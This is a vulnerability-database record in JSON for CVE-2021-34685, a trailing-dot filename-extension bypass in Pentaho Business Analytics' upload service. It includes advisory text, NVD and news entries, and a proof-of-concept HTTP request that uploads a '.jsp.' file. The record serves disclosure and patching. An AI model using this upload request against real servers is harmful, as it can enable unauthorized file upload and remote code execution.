Pentaho allows users to upload files of several types. The upload service is implemented under the /pentaho/UploadService endpoint. The file types allowed by the application are csv, dat, txt, tar, zip, tgz, gz and gzip. When a file with any other extension is uploaded, the application responds with the error message "UploadFileServlet.ERROR_0011 - File type not allowed. Allowable types are csv,dat,txt,tar,zip,tgz,gz,gzip". However, the file extension check can be bypassed by including a single dot "." at the end of the filename.
{"id": "1337DAY-ID-37008", "vendorId": null, "type": "zdt", "bulletinFamily": "exploit", "title": "Pentaho Business Analytics / Pentaho Business Server 9.1 Filename Bypass Vulnerability", "description": "Pentaho allows users to upload various files of different file types. The upload service is implemented under the /pentaho/UploadService endpoint. The file types allowed by the application are csv, dat, txt, tar, zip, tgz, gz, gzip. When uploading a file with an extension other than the allowed file types, the application responds with the error message of UploadFileServlet.ERROR_0011 - File type not allowed. Allowable types are csv,dat,txt,tar,zip,tgz,gz,gzip. However, the file extension check can be bypassed by including a single dot \".\" at the end of the filename.", "published": "2021-11-07T00:00:00", "modified": "2021-11-07T00:00:00", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/37008", "reporter": "BlackHawk", "references": [], "cvelist": ["CVE-2021-34685"], "immutableFields": [], 
"lastseen": "2021-12-16T07:43:01", "viewCount": 122, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-34685"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164775"]}, {"type": "thn", "idList": ["THN:971D1D4FF2740FC9D6A574C660FBC692"]}], "rev": 4}, "score": {"value": 5.7, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-34685"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164775"]}, {"type": "thn", "idList": ["THN:971D1D4FF2740FC9D6A574C660FBC692"]}]}, "exploitation": null, "vulnersScore": 5.7}, "sourceHref": "https://0day.today/exploit/37008", "sourceData": "Product: Pentaho Business Analytics / Pentaho Business Server\nVendor / Manufacturer: Hitachi Vantara\nAffected Version(s): <= 9.1\nVulnerability Type: Bypass of Filename Extension Restrictions\nSolution Status: Fix Released on public GitHub repository\nManufacturer Notification: June 2021\nPublic Disclosure: 01 November 2021\nCVE Reference: CVE-2021-34685\nAuthor(s) of Advisory: Alberto Favero ( HawSec ) & Altion Malka\n\n--- ### --- ### ---\n\nProduct Description:\n\nPentaho is business intelligence (BI) software that provides data\nintegration, OLAP services, reporting, information dashboards, data mining\nand extract, transform, load (ETL) capabilities. Its headquarters are in\nOrlando, Florida. Pentaho was acquired by Hitachi Data Systems in 2015 and\nin 2017 became part of Hitachi Vantara.\n\n( Source: https://en.wikipedia.org/wiki/Pentaho )\n\n--- ### --- ### ---\n\nVulnerability Details:\n\nPentaho allows users to upload various files of different file types. The\nupload service is implemented under the \"/pentaho/UploadService\" endpoint.\nThe file types allowed by the application are \u201ccsv, dat, txt, tar, zip,\ntgz, gz, gzip\u201d. When uploading a file with an extension other than the\nallowed file types, the application responds with the error message of\n\"UploadFileServlet.ERROR_0011 - File type not allowed. 
Allowable types are\ncsv,dat,txt,tar,zip,tgz,gz,gzip\". However, the file extension check can be\nbypassed by including a single dot \".\" at the end of the filename.\n\n\n--- ### --- ### ---\n\nProof of Concept (PoC):\n\nSee Ginger ( https://github.com/HawSec/ginger )\n\nor\n\n--- ~~~ --- ~~~ ---\nPOST\n/pentaho/UploadService?file_name=test_file.jsp.&mark_temporary=false&unzip=false\nHTTP/1.1\nHost: localhost:8080\nContent-Length: 194\nCookie: session-flushed=true; JSESSIONID=A0D2E6A3857C5B7EEF763821513174E9;\nclient-time-offset=32; JSESSIONID=2D525AE6A712A91E6CA1CBE50177559C;\nsession-expiry=1617569433767; server-time=1617562233767\nConnection: close\n------WebKitFormBoundary1k7sJ9yjEbfj39Fl\nContent-Disposition: form-data; name=\"uploadFormElement\";\nfilename=\"test_file.txt\"\nContent-Type: text/plain\n[...]\nFILE_CONTENTS\n[...]\n------WebKitFormBoundary1k7sJ9yjEbfj39Fl--\n\n\nHTTP/1.1 200\nSet-Cookie: session-expiry=1617572215172; Path=/\nSet-Cookie: server-time=1617565015172; Path=/\nContent-Type: text/plain;charset=ISO-8859-1\nContent-Length: 6\nDate: Sun, 04 Apr 2021 19:36:55 GMT\nConnection: close\ntest_file.jsp.\n--- ~~~ --- ~~~ ---\n\n\n--- ### --- ### ---\n", "category": "web applications", "verified": true, "_state": {"dependencies": 1646200327}}
{"packetstorm": [{"lastseen": "2021-11-05T16:24:57", "description": "", "cvss3": {}, "published": "2021-11-05T00:00:00", "type": "packetstorm", "title": "Pentaho Business Analytics / Pentaho Business Server 9.1 Filename Bypass", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-34685"], "modified": "2021-11-05T00:00:00", "id": "PACKETSTORM:164775", "href": "https://packetstormsecurity.com/files/164775/Pentaho-Business-Analytics-Pentaho-Business-Server-9.1-Filename-Bypass.html", "sourceData": "`Product: Pentaho Business Analytics / Pentaho Business Server \nVendor / Manufacturer: Hitachi Vantara \nAffected Version(s): <= 9.1 \nVulnerability Type: Bypass of Filename Extension Restrictions \nSolution Status: Fix Released on public GitHub repository \nManufacturer Notification: June 2021 \nPublic Disclosure: 01 November 2021 \nCVE Reference: CVE-2021-34685 \nAuthor(s) of Advisory: Alberto Favero ( HawSec ) & Altion Malka \n \n--- ### --- ### --- \n \nProduct Description: \n \nPentaho is business intelligence (BI) software that provides data \nintegration, OLAP services, reporting, information dashboards, data mining \nand extract, transform, load (ETL) capabilities. Its headquarters are in \nOrlando, Florida. Pentaho was acquired by Hitachi Data Systems in 2015 and \nin 2017 became part of Hitachi Vantara. \n \n( Source: https://en.wikipedia.org/wiki/Pentaho ) \n \n--- ### --- ### --- \n \nVulnerability Details: \n \nPentaho allows users to upload various files of different file types. The \nupload service is implemented under the \"/pentaho/UploadService\" endpoint. \nThe file types allowed by the application are \u201ccsv, dat, txt, tar, zip, \ntgz, gz, gzip\u201d. When uploading a file with an extension other than the \nallowed file types, the application responds with the error message of \n\"UploadFileServlet.ERROR_0011 - File type not allowed. Allowable types are \ncsv,dat,txt,tar,zip,tgz,gz,gzip\". 
However, the file extension check can be \nbypassed by including a single dot \".\" at the end of the filename. \n \n \n--- ### --- ### --- \n \nProof of Concept (PoC): \n \nSee Ginger ( https://github.com/HawSec/ginger ) \n \nor \n \n--- ~~~ --- ~~~ --- \nPOST \n/pentaho/UploadService?file_name=test_file.jsp.&mark_temporary=false&unzip=false \nHTTP/1.1 \nHost: localhost:8080 \nContent-Length: 194 \nCookie: session-flushed=true; JSESSIONID=A0D2E6A3857C5B7EEF763821513174E9; \nclient-time-offset=32; JSESSIONID=2D525AE6A712A91E6CA1CBE50177559C; \nsession-expiry=1617569433767; server-time=1617562233767 \nConnection: close \n------WebKitFormBoundary1k7sJ9yjEbfj39Fl \nContent-Disposition: form-data; name=\"uploadFormElement\"; \nfilename=\"test_file.txt\" \nContent-Type: text/plain \n[...] \nFILE_CONTENTS \n[...] \n------WebKitFormBoundary1k7sJ9yjEbfj39Fl-- \n \n \nHTTP/1.1 200 \nSet-Cookie: session-expiry=1617572215172; Path=/ \nSet-Cookie: server-time=1617565015172; Path=/ \nContent-Type: text/plain;charset=ISO-8859-1 \nContent-Length: 6 \nDate: Sun, 04 Apr 2021 19:36:55 GMT \nConnection: close \ntest_file.jsp. \n--- ~~~ --- ~~~ --- \n \n \n--- ### --- ### --- \n \n \nCredits: \n \nThis vulnerability was discovered by Alberto Favero & Altion Malka \n \n--- ### --- ### --- \n \n \n \n \n-- \nBlackHawk - hawkgotyou@gmail.com \n \nExperientia senum, agilitas iuvenum. \nAdversa fortiter. Dubia prudenter. \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/164775/pba91-bypass.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2022-03-23T18:44:50", "description": "UploadService in Hitachi Vantara Pentaho Business Analytics through 9.1 does not properly verify uploaded user files, which allows an authenticated user to upload various files of different file types. Specifically, a .jsp file is not allowed, but a .jsp. 
file is allowed (and leads to remote code execution).", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-08T04:15:00", "type": "cve", "title": "CVE-2021-34685", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34685"], "modified": "2021-11-09T21:52:00", "cpe": ["cpe:/a:hitachi:vantara_pentaho:9.1.0.0"], "id": "CVE-2021-34685", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-34685", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:hitachi:vantara_pentaho:9.1.0.0:*:*:*:*:*:*:*"]}], "thn": [{"lastseen": "2022-05-09T12:38:08", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEizEp4OQW4wDSNAwvq0uto9BsVPAPqFrpSplKCFNc2FLYULJxOlzJJKRdvTsocAUdVK6Q7iMhb33WLc_9quIR5tIy8zXmcMA3QRMLJ-bzkUls4r_8vldCzMjt1r7qtqwnyJ7HU4MD7ic5vaRrthteD9KKY8XDReyeezNrRpChpSOXhEFwWYQMP9iuuy>)\n\nMultiple vulnerabilities have been disclosed in Hitachi Vantara's Pentaho Business Analytics software that could be abused by malicious actors to upload arbitrary data files and even execute arbitrary code on the underlying host system of the 
application.\n\nThe security weaknesses were [reported](<https://hawsec.com/publications/pentaho/>) by researchers Alberto Favero from German cybersecurity firm Hawsec and [Altion Malka](<https://twitter.com/altion_m>) from Census Labs earlier this year, prompting the company to [issue](<https://github.com/pentaho>) necessary patches to address the issues.\n\nPentaho is a Java-based business intelligence platform that offers data integration, analytics, online analytical processing (OLAP), and mining capabilities, and [counts](<https://censys.io/ipv4?q=Pentaho+Login>) major [companies and organizations](<https://www.hitachivantara.com/en-in/company/customer-stories/customer-search.html#cust=all>) like Bell, CERN, Cipal, Logitech, Nasdaq, Telefonica, Teradata, and the National September 11 Memorial and Museum among its customers.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEjfjTs-qL76pYM54vlXnuFdLAB90GBtdKYkGTgBKY_DwFHQ7H4il5cak4SWSlwNG937cGba93b9PZlo2xHjjGAaQm2OrX9ifKaSKklHysLDUOQ098-Q0mSE7smMcHNkZHwYv1DFdrWLbHgTcS9bpCWqzkliZi9vkM9a24rAh33ZrFBFa-MBK4TBAzCc>)\n\nThe list of flaws, which affect Pentaho Business Analytics versions 9.1 and lower, is as follows -\n\n * **CVE-2021-31599** (CVSS score: 9.9) - Remote Code Execution through Pentaho Report Bundles\n * **CVE-2021-31600** (CVSS score: 4.3) - Jackrabbit User Enumeration\n * **CVE-2021-31601** (CVSS score: 7.1) - Insufficient Access Control of Data Source Management\n * **CVE-2021-31602** (CVSS score: 5.3) - Authentication Bypass of Spring APIs\n * **CVE-2021-34684** (CVSS score: 9.8) - Unauthenticated SQL Injection\n * **CVE-2021-34685** (CVSS score: 2.7) - Bypass of Filename Extension Restrictions\n\nSuccessful exploitation of the flaws could allow authenticated users with sufficient role permissions to upload and run Pentaho Report Bundles to run malicious code on the host server and exfiltrate sensitive application data, and circumvent filename extension restrictions enforced by the application 
and upload files of any type.\n\nWhat's more, they could also be leveraged by a low-privilege authenticated attacker to retrieve credentials and connection details of all Pentaho data sources, permitting the party to harvest and transmit data, in addition to enabling an unauthenticated user to execute arbitrary SQL queries on the backend database and retrieve data.\n\nIn light of the critical nature of the flaws and the risk they pose to the underlying system, users of the application are highly recommended to update to the latest version.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-01T12:08:00", "type": "thn", "title": "Critical Flaws Uncovered in Pentaho Business Analytics Software", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31599", "CVE-2021-31600", "CVE-2021-31601", "CVE-2021-31602", "CVE-2021-34684", 
"CVE-2021-34685"], "modified": "2021-11-01T19:21:43", "id": "THN:971D1D4FF2740FC9D6A574C660FBC692", "href": "https://thehackernews.com/2021/11/critical-flaws-uncovered-in-pentaho.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}